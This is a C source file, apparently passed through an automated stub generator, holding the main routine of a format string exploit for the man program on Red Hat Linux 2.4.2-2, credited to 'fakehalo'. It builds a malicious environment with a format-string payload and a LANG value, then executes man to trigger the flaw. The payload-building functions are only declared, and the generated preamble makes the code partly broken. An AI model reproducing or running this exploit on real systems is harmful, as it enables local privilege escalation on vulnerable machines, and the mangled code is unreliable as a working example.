
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int environ ;


 int PATH ;
 scalar_t__ atoi (char*) ;
 int bzero (void*,int) ;
 scalar_t__ execlp (int ,int ,int ) ;
 int exit (int) ;
 scalar_t__ malloc (int) ;
 int printe (char*) ;
 int printf (char*,char*) ;
 char* setfmtmem (scalar_t__) ;
 char* setlang (scalar_t__) ;

int main(int argc,char **argv){
 extern char **environ;

 if(argc<2){
  printf("(*)man[v1.5l]: format string exploit.\n"
  "(*)by: v9@fakehalo.deadpig.org / fakehalo.\n\n"
  "syntax: %s <platform>\n"
  " 0 : Compiled RH/linux 2.4.2-2.\n",argv[0]);
  exit(1);
 }
 if(atoi(argv[1])>0)
  printe("main(): invalid platform number");




 bzero((void *)&environ,sizeof(environ));
 if(!(environ=(char **)malloc(3*(sizeof(char *)))))
  printe("main(): allocation of memory error");


 environ[0]=setfmtmem(atoi(argv[1]));


 environ[1]=setlang(atoi(argv[1]));
 environ[2]=0x0;

 if(execlp(PATH,PATH,0))
  printe("main(): failed to execute man");

 exit(0);
}
